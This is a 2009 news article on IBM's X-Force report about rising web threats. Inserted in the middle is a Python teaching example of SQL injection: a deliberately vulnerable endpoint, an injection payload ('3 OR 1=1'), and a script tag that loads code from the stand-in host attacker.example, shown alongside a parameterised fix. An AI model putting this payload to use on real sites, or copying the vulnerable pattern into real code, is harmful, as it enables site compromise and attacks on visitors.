IBM X-Force Security Report Calls Web Insecure
(newsfactor.com) - Web insecurity. That's the two-word summary of IBM's X-Force 2009 Mid-Year Trend and Risk Report. Big Blue released its latest survey Wednesday with some troubling news: Web client, server and content threats are converging to create an untenable risk landscape.
IBM recorded a 508 percent increase in the number of new malicious Web links discovered in the first half of 2009 -- and the problem is no longer limited to malicious domains or untrusted Web sites. The X-Force report points to an increase in the presence of malicious content on trusted sites, including popular search engines, blogs, bulletin boards, personal Web sites, online magazines, and mainstream news sites. For victims, the consequence is that attackers gain access to private data.
The X-Force report also found evidence that attackers are getting more sophisticated. Veiled Web exploits, especially malicious PDF files, are at an all-time high: PDF vulnerabilities disclosed in the first half of 2009 surpassed the total for all of 2008. From the first quarter to the second quarter alone, the amount of suspicious, obfuscated or concealed content monitored by the IBM ISS Managed Security Services team nearly doubled.
Safe Browsing Extinct
"The trends highlighted by the report seem to indicate that the Internet has finally taken on the characteristics of the Wild West where no one is to be trusted," said X-Force Director Kris Lamb. "There is no such thing as safe browsing today and it is no longer the case that only the red-light district sites are responsible for malware. We've reached a tipping point where every Web site should be viewed as suspicious and every user is at risk. The threat convergence of the Web ecosystem is creating a perfect storm of criminal activity."
Web security is no longer just a browser or client-side issue, according to IBM. Criminals are also leveraging insecure Web applications to target users of legitimate Web sites. The X-Force report found a sharp increase in Web-application attacks aimed at stealing and manipulating data and at taking control of infected computers. SQL-injection attacks rose 50 percent from the fourth quarter of 2008 to the first quarter of 2009 -- and then nearly doubled from the first quarter to the second quarter.
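The mechanism behind "leveraging insecure Web applications to target legitimate Web-site users" is worth seeing concretely. The following is an added example, written for this page and not taken from the X-Force report or from any product mentioned in the article: a Python/sqlite3 model of a post-editing endpoint whose UPDATE statement is assembled by string concatenation. The developer escaped the post body but dropped the numeric id straight into the WHERE clause, so a tampered id of `3 OR 1=1` rewrites every post on the site with an off-site script include, which is how a trusted site ends up serving malicious content. The hardened version validates the id and binds both values as parameters. The table, the seed posts, the attacker hostname `attacker.example` and the payload are all constructed for the example.

```python
import sqlite3

# Constructed sample data for the example; not from the report.
SEED_POSTS = [
    (1, "Welcome to the site"),
    (2, "Quarterly results posted"),
    (3, "Contact us"),
]

# Hypothetical attacker payload: an off-site script include of the kind that
# mass SQL-injection campaigns plant on otherwise legitimate pages.
MALICIOUS_BODY = '<script src="http://attacker.example/evil.js"></script>'


def make_db():
    """Fresh in-memory database holding the constructed posts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?)", SEED_POSTS)
    conn.commit()
    return conn


def update_post_vulnerable(conn, post_id, body):
    """Builds the UPDATE by concatenation. The body is quote-escaped, but the
    id from the request is dropped into the WHERE clause unquoted and
    unchecked, so the caller controls the shape of the statement."""
    sql = (
        "UPDATE posts SET body = '" + body.replace("'", "''") + "'"
        " WHERE id = " + post_id
    )
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount  # number of rows the attacker just rewrote


def update_post_hardened(conn, post_id, body):
    """Validates the id as an integer and binds both values as parameters,
    so request data can only ever be a value, never SQL."""
    try:
        pid = int(post_id)
    except ValueError:
        return 0  # reject non-numeric ids instead of interpolating them
    cur = conn.execute("UPDATE posts SET body = ? WHERE id = ?", (body, pid))
    conn.commit()
    return cur.rowcount


def infected_count(conn):
    """How many posts now carry a script tag in their body."""
    row = conn.execute(
        "SELECT COUNT(*) FROM posts WHERE body LIKE '%<script%'"
    ).fetchone()
    return row[0]


def demo():
    # The attacker may legitimately edit post 3 but tampers with the id.
    payload_id = "3 OR 1=1"

    vuln = make_db()
    rewritten = update_post_vulnerable(vuln, payload_id, MALICIOUS_BODY)
    vuln_infected = infected_count(vuln)

    hard = make_db()
    rewritten_hard = update_post_hardened(hard, payload_id, MALICIOUS_BODY)
    hard_infected = infected_count(hard)

    return {
        "vulnerable_rows_rewritten": rewritten,       # every post on the site
        "vulnerable_infected": vuln_infected,
        "hardened_rows_rewritten": rewritten_hard,    # request rejected
        "hardened_infected": hard_infected,
    }


if __name__ == "__main__":
    print(demo())
```

The point of the escaped body alongside the unescaped id is that escaping individual fields is not a defense; one forgotten parameter is enough. Parameterized statements make the distinction between code and data structural, and the integer check gives the endpoint a second, independent reason to reject the request.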
"Two of the major themes for the first half of 2009 are the increase in sites hosting malware and the doubling of obfuscated Web attacks," Lamb said. "The trends seem to reveal a fundamental security weakness in the Web ecosystem where interoperability between browsers, plug-ins, content and server applications dramatically increases the complexity and risk. Criminals are taking advantage of the fact that there is no such thing as a safe browsing environment and are leveraging insecure Web applications to target legitimate Web-site users."
The Stark Reality
Among other X-Force report findings, vulnerabilities have reached a plateau, Trojans account for more than half of all new malware, phishing has decreased dramatically, URL spam is still number one, image spam is making a comeback, and nearly half of all vulnerabilities remain unpatched.
Trojans accounted for 55 percent of all new malware, a nine percent increase from the first half of 2008. Information-stealing Trojans are the most prevalent. Meanwhile, analysts believe banking Trojans are taking the place of phishing attacks geared toward financial targets. In the first half of 2009, 66 percent of phishing was targeted at the financial industry, down from 90 percent in 2008. Online payment targets made up 31 percent of the share.
Ken Dunham, director of global response for iSIGHT Partners, said the way people use the Internet today is changing the way criminals are attacking. He pointed to malvertising (malicious advertising links) and rogue software makers who are heavily involved in SEO poisoning techniques. When someone surfs the Internet, potentially fraudulent advertising links appear alongside legitimate search results.
"Attackers are using very aggressive techniques, and sometimes they even advertise their rogue products through legitimate advertising agencies," Dunham said. "The reality is that the ads you see may not be safe. These guys use these same techniques around popular media figures to trick people. Just searching the Web can result in you being redirected to a malicious site or any number of other risks. There are many vectors designed for people who surf."